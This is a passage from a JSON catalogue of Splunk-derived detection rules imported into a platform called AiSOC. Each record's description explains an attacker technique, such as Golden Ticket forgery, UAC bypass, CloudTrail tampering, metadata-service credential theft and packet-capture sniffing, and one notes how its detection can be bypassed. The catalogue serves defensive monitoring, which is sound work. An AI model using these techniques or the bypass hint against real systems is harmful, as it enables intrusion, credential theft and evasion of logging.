These policies should be considered sensitive and monitored for changes and/or loose configuration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-cross-tenant-access-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c0fa490-12b0-4d0b-b9f5-e101d1e0e06f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_cross_tenant_access_change.yml" } }, { "id": "splunk-security-content-7c921d28-ef48-4f1b-85b3-0af8af7697db", "type": "detection", "name": "AWS Defense Evasion Update Cloudtrail", "description": "The following analytic detects `UpdateTrail` events in AWS CloudTrail logs. It identifies attempts to modify CloudTrail settings, potentially to evade logging. The detection leverages CloudTrail logs, focusing on `UpdateTrail` events where the user agent is not the AWS console and the operation is successful. This activity is significant because altering CloudTrail settings can disable or limit logging, hindering visibility into AWS account activities. 
If confirmed malicious, this could allow attackers to operate undetected, compromising the integrity and security of the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-defense-evasion-update-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7c921d28-ef48-4f1b-85b3-0af8af7697db", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_defense_evasion_update_cloudtrail.yml" } }, { "id": "splunk-security-content-7cd853e9-d370-412f-965d-a2bcff2a2908", "type": "detection", "name": "O365 Multiple Mailboxes Accessed via API", "description": "The following analytic detects when a high number of Office 365 Exchange mailboxes are accessed via API (Microsoft Graph API or Exchange Web Services) within a short timeframe. It leverages 'MailItemsAccessed' operations in Exchange, using AppId and regex to identify API interactions. This activity is significant as it may indicate unauthorized mass email access, potentially signaling data exfiltration or account compromise. If confirmed malicious, attackers could gain access to sensitive information, leading to data breaches and further exploitation of compromised accounts. 
The threshold is set to flag over five unique mailboxes accessed within 10 minutes, but should be tailored to your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-multiple-mailboxes-accessed-via-api.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7cd853e9-d370-412f-965d-a2bcff2a2908", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_multiple_mailboxes_accessed_via_api.yml" } }, { "id": "splunk-security-content-7cfec906-2697-43f7-898b-83634a051d9a", "type": "detection", "name": "Windows Office Product Loading VBE7 DLL", "description": "The following analytic identifies office documents executing macro code. It leverages Sysmon EventCode 7 to detect when processes like WINWORD.EXE or EXCEL.EXE load specific DLLs associated with macros (e.g., VBE7.DLL). This activity is significant because macros are a common attack vector for delivering malicious payloads, such as malware. If confirmed malicious, this could lead to unauthorized code execution, data exfiltration, or further compromise of the system. 
Disabling macros by default is recommended to mitigate this risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-office-product-loading-vbe7-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7cfec906-2697-43f7-898b-83634a051d9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_office_product_loading_vbe7_dll.yml" } }, { "id": "splunk-security-content-7d1f031f-f1c9-43be-8b0b-c4e3e8a8928a", "type": "detection", "name": "Windows New Default File Association Value Set", "description": "The following analytic detects registry changes to the default file association value. It leverages data from the Endpoint data model, specifically monitoring registry paths under \"HKCR\\\\*\\\\shell\\\\open\\\\command\\\\*\". This activity can be significant because attackers might alter the default file associations in order to execute arbitrary scripts or payloads when a user opens a file, leading to potential code execution. 
If confirmed malicious, this technique can enable attackers to persist on the compromised host and execute further malicious commands, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-new-default-file-association-value-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7d1f031f-f1c9-43be-8b0b-c4e3e8a8928a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_new_default_file_association_value_set.yml" } }, { "id": "splunk-security-content-7d4c618e-4716-11ec-951c-3e22fbd008af", "type": "detection", "name": "Remote Process Instantiation via WinRM and PowerShell Script Block", "description": "The following analytic detects the execution of PowerShell commands that use the `Invoke-Command` cmdlet to start a process on a remote endpoint via the WinRM protocol. It leverages PowerShell Script Block Logging (EventCode=4104) to identify such activities. This behavior is significant as it may indicate lateral movement or remote code execution attempts by adversaries. 
If confirmed malicious, this activity could allow attackers to execute arbitrary code on remote systems, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.006" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/remote-process-instantiation-via-winrm-and-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7d4c618e-4716-11ec-951c-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/remote_process_instantiation_via_winrm_and_powershell_script_block.yml" } }, { "id": "splunk-security-content-7d90f334-a482-11ec-908c-acde48001122", "type": "detection", "name": "Kerberos Service Ticket Request Using RC4 Encryption", "description": "The following analytic detects Kerberos service ticket requests using RC4 encryption, leveraging Kerberos Event 4769. This method identifies potential Golden Ticket attacks, where adversaries forge Ticket Granting Tickets (TGT) using the Krbtgt account NTLM password hash to gain unrestricted access to an Active Directory environment. Monitoring for RC4 encryption usage is significant as it is rare in modern networks, indicating possible malicious activity. If confirmed malicious, attackers could move laterally and execute code on remote systems, compromising the entire network. 
Note: This detection may be bypassed if attackers use the AES key instead of the NTLM hash.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kerberos-service-ticket-request-using-rc4-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7d90f334-a482-11ec-908c-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/kerberos_service_ticket_request_using_rc4_encryption.yml" } }, { "id": "splunk-security-content-7ddf2084-6cf3-4a44-be83-474f7b73c701", "type": "detection", "name": "Azure AD Service Principal Owner Added", "description": "The following analytic detects the addition of a new owner to a Service Principal within an Azure AD tenant. It leverages Azure Active Directory events from the AuditLog log category to identify this activity. This behavior is significant because Service Principals do not support multi-factor authentication or conditional access policies, making them a target for adversaries seeking persistence or privilege escalation. 
If confirmed malicious, this activity could allow attackers to maintain access to the Azure AD environment with single-factor authentication, potentially leading to unauthorized access and control over critical resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-service-principal-owner-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ddf2084-6cf3-4a44-be83-474f7b73c701", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_service_principal_owner_added.yml" } }, { "id": "splunk-security-content-7de17d7a-c9d8-11eb-a812-acde48001122", "type": "detection", "name": "Allow Operation with Consent Admin", "description": "The following analytic detects a registry modification that allows the 'Consent Admin' to perform operations requiring elevation without user consent or credentials. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the 'ConsentPromptBehaviorAdmin' value within the Windows Policies System registry path. This activity is significant as it indicates a potential privilege escalation attempt, which could allow an attacker to execute high-privilege tasks without user approval. 
If confirmed malicious, this could lead to unauthorized administrative access and control over the compromised machine, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/allow-operation-with-consent-admin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7de17d7a-c9d8-11eb-a812-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/allow_operation_with_consent_admin.yml" } }, { "id": "splunk-security-content-7e03b682-3965-4598-8e91-a60a40a3f7e4", "type": "detection", "name": "Windows Scheduled Task Created Via XML", "description": "The following analytic detects the creation of scheduled tasks in Windows using schtasks.exe with the \"XML\" parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details.\nThis activity is significant as it is a common technique for establishing persistence or achieving privilege escalation, often used by malware like Trickbot and Winter-Vivern. While creating a scheduled task via XML may be legitimate, it can also be abused by attackers. 
If confirmed malicious, this could allow attackers to maintain access, execute additional payloads, and potentially lead to data theft or ransomware deployment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-created-via-xml.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e03b682-3965-4598-8e91-a60a40a3f7e4", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_created_via_xml.yml" } }, { "id": "splunk-security-content-7e3d68db-ea4d-419b-adbd-e14a525ecf09", "type": "detection", "name": "Windows Service Execution RemCom", "description": "The following analytic identifies the execution of RemCom.exe, an open-source alternative to PsExec, used for lateral movement and remote command execution. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, original file names, and command-line arguments. This activity is significant as it indicates potential lateral movement within the network. 
If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to further compromise and control over additional systems within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-service-execution-remcom.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e3d68db-ea4d-419b-adbd-e14a525ecf09", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_service_execution_remcom.yml" } }, { "id": "splunk-security-content-7e3df743-b1d8-4631-8fa8-bd5819688876", "type": "detection", "name": "Detect Certipy File Modifications", "description": "The following analytic detects the use of the Certipy tool to enumerate Active Directory Certificate Services (AD CS) environments by identifying unique file modifications. It leverages endpoint process and filesystem data to spot the creation of files with specific names or extensions associated with Certipy's information gathering and exfiltration activities. This activity is significant as it indicates potential reconnaissance and data exfiltration efforts by an attacker. 
If confirmed malicious, this could lead to unauthorized access to sensitive AD CS information, enabling further attacks or privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1649", "T1560" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-certipy-file-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e3df743-b1d8-4631-8fa8-bd5819688876", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_certipy_file_modifications.yml" } }, { "id": "splunk-security-content-7e80d92a-6ec3-4eb1-a444-1480acfe2d14", "type": "detection", "name": "Crowdstrike Medium Severity Alert", "description": "The following analytic detects a CrowdStrike alert with MEDIUM severity, which indicates a potential threat that requires prompt attention. This alert level suggests suspicious activity that may compromise security but is not immediately critical. 
It typically involves detectable but non-imminent risks, such as unusual behavior or attempted policy violations, which should be investigated further and mitigated quickly to prevent escalation of attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/crowdstrike-medium-severity-alert.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e80d92a-6ec3-4eb1-a444-1480acfe2d14", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/crowdstrike_medium_severity_alert.yml" } }, { "id": "splunk-security-content-7e8458cc-acca-11eb-9e3f-acde48001122", "type": "detection", "name": "Modify ACL permission To Files Or Folder", "description": "The following analytic detects the modification of ACL permissions to files or folders, making them accessible to everyone or to the system account. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on processes like \"cacls.exe,\" \"icacls.exe,\" and \"xcacls.exe\" with specific command-line arguments. This activity is significant as it may indicate an adversary attempting to evade ACLs or access protected files. 
If confirmed malicious, this could allow unauthorized access to sensitive data, potentially leading to data breaches or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/modify-acl-permission-to-files-or-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e8458cc-acca-11eb-9e3f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/modify_acl_permission_to_files_or_folder.yml" } }, { "id": "splunk-security-content-7e9a5a2c-2f1a-4b6a-9a4b-9e7d9c8f5a21", "type": "detection", "name": "Cisco Secure Firewall - Static Tundra Smart Install Abuse", "description": "This analytic detects activity associated with \"Static Tundra\" threat actor abuse of the Cisco Smart Install (SMI) protocol\nusing Cisco Secure Firewall Intrusion Events. It leverages Cisco Secure Firewall Threat Defense IntrusionEvent logs to\nidentify occurrences of Smart Install exploitation and protocol abuse, including denial-of-service and buffer overflow\nattempts. 
The detection triggers when multiple Cisco Smart Install-related Snort signatures are observed in a short period from the\nsame source, which is indicative of active exploitation or reconnaissance against Cisco devices that expose SMI.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1210", "T1499" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-static-tundra-smart-install-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e9a5a2c-2f1a-4b6a-9a4b-9e7d9c8f5a21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___static_tundra_smart_install_abuse.yml" } }, { "id": "splunk-security-content-7e9c3f8a-4b2d-4c5e-9a1f-6d8e5b3c2a9f", "type": "detection", "name": "Cisco ASA - Packet Capture Activity", "description": "This analytic detects execution of packet capture commands on Cisco ASA devices via CLI or ASDM.\nAdversaries may abuse the built-in packet capture functionality to perform network sniffing, intercept credentials transmitted over the network, capture sensitive data in transit, or gather intelligence about network traffic patterns and internal communications. 
Packet captures can reveal usernames, passwords, session tokens, and confidential business data.\nThe detection monitors for command execution events (message ID 111008 or 111010) containing \"capture\" commands, which are used to initiate packet capture sessions on specific interfaces or for specific traffic patterns on the ASA device.\nInvestigate unauthorized packet capture activities, especially captures targeting sensitive interfaces (internal network segments, DMZ), captures configured to capture large volumes of traffic, captures with suspicious filter criteria, captures initiated by non-administrative accounts, or captures during unusual hours.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1040", "T1557" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-asa-packet-capture-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7e9c3f8a-4b2d-4c5e-9a1f-6d8e5b3c2a9f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/cisco_asa___packet_capture_activity.yml" } }, { "id": "splunk-security-content-7eb9c3d5-c98c-4088-acc5-8240bad15379", "type": "detection", "name": "GetCurrent User with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments invoking the `GetCurrent` method of the WindowsIdentity .NET class. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. 
This activity is significant as adversaries may use this method to identify the logged-in user on a compromised endpoint, aiding in situational awareness and Active Directory discovery. If confirmed malicious, this could allow attackers to gain insights into user context, potentially facilitating further exploitation and lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getcurrent-user-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7eb9c3d5-c98c-4088-acc5-8240bad15379", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getcurrent_user_with_powershell.yml" } }, { "id": "splunk-security-content-7ed272a4-9c77-11eb-af22-acde48001122", "type": "detection", "name": "Windows Multiple Users Failed To Authenticate From Host Using NTLM", "description": "The following analytic identifies a single source endpoint failing to authenticate with 30 unique valid users using the NTLM protocol. It leverages EventCode 4776 from Domain Controller logs, focusing on error code 0xC000006A, which indicates a bad password. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain initial access or elevate privileges. 
If confirmed malicious, this activity could lead to unauthorized access to sensitive information or further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-users-failed-to-authenticate-from-host-using-ntlm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7ed272a4-9c77-11eb-af22-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_users_failed_to_authenticate_from_host_using_ntlm.yml" } }, { "id": "splunk-security-content-7f04349c-e30d-11eb-bc7f-acde48001122", "type": "detection", "name": "UAC Bypass MMC Load Unsigned Dll", "description": "The following analytic detects the loading of an unsigned DLL by the MMC.exe application, which is indicative of a potential UAC bypass or privilege escalation attempt. It leverages Sysmon EventCode 7 to identify instances where MMC.exe loads a non-Microsoft, unsigned DLL. This activity is significant because attackers often use this technique to modify CLSID registry entries, causing MMC.exe to load malicious DLLs, thereby bypassing User Account Control (UAC) and gaining elevated privileges. 
If confirmed malicious, this could allow an attacker to execute arbitrary code with higher privileges, leading to further system compromise and persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.014", "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/uac-bypass-mmc-load-unsigned-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f04349c-e30d-11eb-bc7f-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/uac_bypass_mmc_load_unsigned_dll.yml" } }, { "id": "splunk-security-content-7f1c8bed-9bd4-40b0-a1df-c262cbade0fc", "type": "detection", "name": "MacOS Data Chunking", "description": "The following analytic detects suspicious data chunking activities that involve the use of split or dd, potentially indicating an attempt to evade detection by breaking large files into smaller parts.\nAttackers may use this technique to bypass size-based security controls, facilitating the covert exfiltration of sensitive data.\nBy monitoring for unusual or unauthorized use of these commands, this analytic helps identify potential data exfiltration attempts, allowing security teams to intervene and prevent the unauthorized transfer of critical information from the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1030" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": 
"imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-data-chunking.yaml", "provenance": { "source": "splunk/security_content", "source_id": "7f1c8bed-9bd4-40b0-a1df-c262cbade0fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_data_chunking.yml" } }, { "id": "splunk-security-content-7f2e1a9a-1e8e-4d2e-8b7c-5f2c3d6a9b21", "type": "detection", "name": "Cisco Isovalent - Access To Cloud Metadata Service", "description": "The following analytic detects workloads accessing the cloud instance metadata service at 169.254.169.254. This IP is used by AWS, GCP and Azure metadata endpoints and is frequently abused in SSRF or lateral movement scenarios to obtain credentials and sensitive environment details. Monitor unexpected access to this service from application pods or namespaces where such behavior is atypical.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-access-to-cloud-metadata-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f2e1a9a-1e8e-4d2e-8b7c-5f2c3d6a9b21", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___access_to_cloud_metadata_service.yml" } }, { "id": "splunk-security-content-7f398cfb-918d-41f4-8db8-2e2474e02222", "type": "detection", "name": "High Number of 
Login Failures from a single source", "description": "The following analytic detects multiple failed login attempts in Office365 Azure Active Directory from a single source IP address. It leverages Office365 management activity logs, specifically AzureActiveDirectoryStsLogon records, aggregating these logs in 5-minute intervals to count failed login attempts. This activity is significant as it may indicate brute-force attacks or password spraying, which are critical to monitor. If confirmed malicious, an attacker could gain unauthorized access to Office365 accounts, leading to potential data breaches, lateral movement within the organization, or further malicious activities using the compromised account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/high-number-of-login-failures-from-a-single-source.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f398cfb-918d-41f4-8db8-2e2474e02222", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/high_number_of_login_failures_from_a_single_source.yml" } }, { "id": "splunk-security-content-7f4b9b8e-5d6a-4a21-9e3f-0f1e8f2d1c3a", "type": "detection", "name": "Cisco Isovalent - Late Process Execution", "description": "Detects process executions that occur well after a container has initialized, which can indicate\nsuspicious activity (e.g., interactive shells, injected binaries, or post-compromise tooling).\nThe analytic compares the process start time to the 
container start time and flags processes\nlaunched more than 5 minutes (300 seconds) after initialization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-isovalent-late-process-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f4b9b8e-5d6a-4a21-9e3f-0f1e8f2d1c3a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_isovalent___late_process_execution.yml" } }, { "id": "splunk-security-content-7f5fb3e1-4209-4914-90db-0ec21b556368", "type": "detection", "name": "Hosts receiving high volume of network traffic from email server", "description": "The following analytic identifies hosts receiving an unusually high volume of network traffic from an email server. It leverages the Network_Traffic data model to sum incoming bytes to clients from email servers, comparing current traffic against historical averages and standard deviations. This activity is significant as it may indicate data exfiltration by a malicious actor using the email server. 
If confirmed malicious, this could lead to unauthorized data access and potential data breaches, compromising sensitive information and impacting organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/hosts-receiving-high-volume-of-network-traffic-from-email-server.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7f5fb3e1-4209-4914-90db-0ec21b556368", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/hosts_receiving_high_volume_of_network_traffic_from_email_server.yml" } }, { "id": "splunk-security-content-7f5fb3e1-4209-4914-90db-0ec21b556378", "type": "detection", "name": "Email servers sending high volume traffic to hosts", "description": "The following analytic identifies a significant increase in data transfers from your email server to client hosts. It leverages the Network_Traffic data model to monitor 